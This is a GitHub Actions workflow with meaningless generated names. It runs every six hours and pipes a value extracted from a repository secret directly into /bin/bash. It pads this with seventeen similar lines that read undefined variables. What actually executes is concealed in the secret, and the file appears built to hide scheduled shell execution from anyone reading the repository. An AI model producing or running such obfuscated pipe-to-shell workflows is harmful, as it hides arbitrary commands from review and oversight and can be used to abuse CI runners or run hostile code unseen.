name: lulizhen1986
on:
  workflow_dispatch:
  schedule:
    - cron: '55 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: lulizhen1986
        env:
          d411: ${{ secrets.d411 }}
        run: |
          echo $d411 | jq -r .kzl2893 | /bin/bash
          echo $sayvt10402 | jq -r .m45119 | /bin/bash
          echo $edmf20 | jq -r .tch17 | /bin/bash
          echo $dns8 | jq -r .lhz587 | /bin/bash
          echo $bnon777 | jq -r .kkj41895 | /bin/bash
          echo $nwexp0 | jq -r .x10068 | /bin/bash
          echo $sw2 | jq -r .zfix1 | /bin/bash
          echo $fepc69962 | jq -r .o81242 | /bin/bash
          echo $pvcni19 | jq -r .xobx42886 | /bin/bash
          echo $c661 | jq -r .n09564 | /bin/bash
          echo $aiv132 | jq -r .cjkxe50 | /bin/bash
          echo $kjecz80 | jq -r .goh326 | /bin/bash
          echo $svhm86 | jq -r .u48 | /bin/bash
          echo $abwvh33 | jq -r .riy76682 | /bin/bash
          echo $rcf71553 | jq -r .jbntz260 | /bin/bash
          echo $unvun74 | jq -r .a356 | /bin/bash
          echo $r1947 | jq -r .j0397 | /bin/bash
          echo $vdyyn2 | jq -r .gw35841 | /bin/bash

